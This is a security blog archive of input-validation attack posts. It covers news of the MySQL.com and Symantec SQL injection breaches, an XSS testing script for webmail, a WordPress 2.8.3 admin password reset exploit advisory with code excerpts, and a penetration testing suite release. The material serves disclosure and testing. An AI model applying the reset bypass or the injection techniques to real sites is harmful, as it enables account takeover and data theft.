Category: Input Validation Attacks

Mar 28 2011

MySQL and Sun websites hacked using SQL injection

MySQL.com, the official website of the database management system of the same name, was today subjected to an attack whereby hackers used SQL injection exploits to gain access to a complete list of usernames and passwords on the site.

News of the attack surfaced when the attackers posted details of the compromise on the Full Disclosure mailing list, publicly listing the contents of database tables used to store member and employee data, but also a small sample of user logins and password hashes.

MySQL Sun Hacked

Owned by Oracle, MySQL is used by millions of websites to store and deliver information, with some of the most popular online services and platforms including WordPress and Joomla utilising the software.

The attack was achieved using “blind SQL injection”, targeting MySQL.com, MySQL.fr, MySQL.de and MySQL.it, but also two Sun domains.

It appears that the attacks were not due to flaws in the MySQL software itself, but flaws in the implementation of their websites.

Jan 12 2011

Excess2 – Webmail XSS Tester

Here is a script to automate testing of webmail systems for cross-site scripting. It uses XSS Cheat Sheet to generate the injection strings. Compared to the previous version this version downloads XSS cheat sheet on the fly (instead of having it hard-coded) and supports SMTP authentication.

Name:
excess2 – A script for testing webmail systems for cross-site scripting problems.

Description:
This script sends a number of HTML-formatted email messages to a specified email address. In order to test a webmail system you need to have an email account on the system, run this script to send messages to that account, and then view the received messages through the webmail interface. If you get a popup box saying “XSS!” it means that your webmail system failed to block the attack.

Try viewing the messages in several different browsers, including Internet Explorer and Mozilla Firefox. Some attacks work in one browser, but don’t work in another.

The script downloads RSnake’s XSS Cheat sheet from http://ha.ckers.org/xssAttacks.xml. This way we always have the latest and greatest XSS attacks. Thanks, RSnake.

Options:
-t you@webmail.example.com The destination email address
-f return-address@example.com From email address. Replies and
rejects will go to that address.
-s mymailserver.example.com SMTP server to use for sending
messages.
-u SMTP server username (if it requires authentication)
-p SMTP server password (if it requires authentication)

Download: Excess2

Nov 28 2009

Symantec Online Store Hacked

Symantec Exposed Passwords, Serials – SQL Injection, Full Database Access

Symantec HackedA self-proclaimed grey-hat hacker has located a critical SQL injection vulnerability in a website belonging to security giant Symantec. The flaw can be leveraged to extract a wealth of information from the database including customer and admin login credentials, product serial numbers, and possibly credit card information.

The flaw was found by a Romanian hacker going by the online handle of Unu, according to whom an insecure parameter of a script from the pcd.symantec.com website, allows for a Blind SQL Injection (SQLi) attack to be performed. In such an attack, the hacker obtains read and/or write permission to the underlying database of the vulnerable website.

The content of the pcd.symantec.com website is written in Japanese, but from what we could determine, it serves a product called Norton PC Doctor. The Web server appears to be running Windows Server 2000 as operating system, Microsoft IIS 6.0 with ASP support and Microsoft SQL Server 2000 as database back-end.

From the screen shots released by Unu there are many potentially interesting databases, but the one he chose to look at is called “symantecstore.” One of the tables in this database is named “PaymentInformationInfo” and contains columns such as BillingAddress, CardExpirationMonth, CardExpirationYear, CardNumber, CardType, CcIssueCode, CustomerEmail, CustomerFirstName, CustomerLastName or SecurityIndicator.

Source: Unu’s Blog

Aug 13 2009

WordPress 2.8.3 Admin Password Reset Exploit

Topic: WordPress <= 2.8.3 Remote admin reset password
Credit: Laurent Gaffié [Laurent.gaffie(at)gmail.com]
Date: 11.08.2009
Proof Of Concept:

The way WordPress handle a password reset looks like this:
You submit your email adress or username via this form
/wp-login.php?action=lostpassword ;
Wordpress send you a reset confirmation like that via email:

Someone has asked to reset the password for the following site and username.

http://DOMAIN_NAME.TLD/wordpress

Username: admin
To reset your password visit the following address:

http://domain_name.tld/wp-login.php?action=rp&key[]=

You click on the link, and then WordPress reset your admin password, and sends you over another email with your new credentials.
Let’s see how it works:

wp-login.php:
…[snip]….
line 186:
function reset_password($key) {
global $wpdb;

$key = preg_replace(‘/[^a-z0-9]/i’, ”, $key);

if ( empty( $key ) )
return new WP_Error(‘invalid_key’, __(‘Invalid key’));

$user = $wpdb->get_row($wpdb->prepare(“SELECT * FROM $wpdb->users
WHERE
user_activation_key = %s”, $key));
if ( empty( $user ) )
return new WP_Error(‘invalid_key’, __(‘Invalid key’));
…[snip]….
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : ‘login’;
$errors = new WP_Error();

if ( isset($_GET['key']) )
$action = ‘resetpass’;

// validate action so as to default to the login screen
if ( !in_array($action, array(‘logout’, ‘lostpassword’,
‘retrievepassword’,
‘resetpass’, ‘rp’, ‘register’, ‘login’)) && false ===
has_filter(‘login_form_’ . $action) )
$action = ‘login’;
…[snip]….

line 370:

break;

case ‘resetpass’ :
case ‘rp’ :
$errors = reset_password($_GET['key']);

if ( ! is_wp_error($errors) ) {
wp_redirect(‘wp-login.php?checkemail=newpass’);
exit();
}

wp_redirect(‘wp-login.php?action=lostpassword&error=invalidkey’);
exit();

break;
…[snip ]…

You can abuse the password reset function, and bypass the first step and then reset the admin password by submitting an array to the $key variable.

Business Impact: An attacker could exploit this vulnerability to reset the admin account of any wordpress/wordpress-mu <= 2.8.3

Solution: WordPress has fixed this problem last night and has been testing the fixes and looking for other problems since then. Version 2.8.4 which fixes all known problems is now available for download and is highly recommended for all users of WordPress.

Feb 19 2009

Fast-Track 4.0

Fast-Track

Automated penetration suite for penetration testers.

Author: David Kennedy, Partner, Practice Lead
Release: February 7, 2009 @ ShmooCon by SecureState

For those of you new to Fast-Track, Fast-Track is a python based open-source project aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. Fast-Track was originally conceived when David Kennedy was on a penetration test and found that there was generally a lack of tools or automation in certain attacks that were normally extremely advanced and time consuming. In an effort to reproduce some of David’s advanced attacks and propagate it down to the team at SecureState, David ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitizing of client-side data within web applications, patch management, or lack of hardening techniques. All of these are relatively simple to fix if you know what to look for, but as penetration testers are extremely common findings for us. Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back relax, crank open a can of jolt cola and enjoy the ride.

Tested On:
Linux: Slackware, Debian, Ubuntu, Back|Track 3, Back|Track 4, Gentoo, FreeBSD, OpenBSD, OSX, RedHat

Dependencies: Metasploit 3, SQLite, PYMSSQL, FreeTDS, Pexpect, ClientForms, Beautiful Soup, and Psycho.

Installation Instructions: When extracting the tarball, run the setup.py file by executing python setup.py install, this will install the needed dependencies MINUS SQLite and Metasploit 3, you should specify the metasploit path or it will default to the BackTrack 3 installation menu. Once the installation is completed, Fast-Track should be fully functional.

Download :
http://www.securestate.com/files/fasttrack/fasttrack.tgz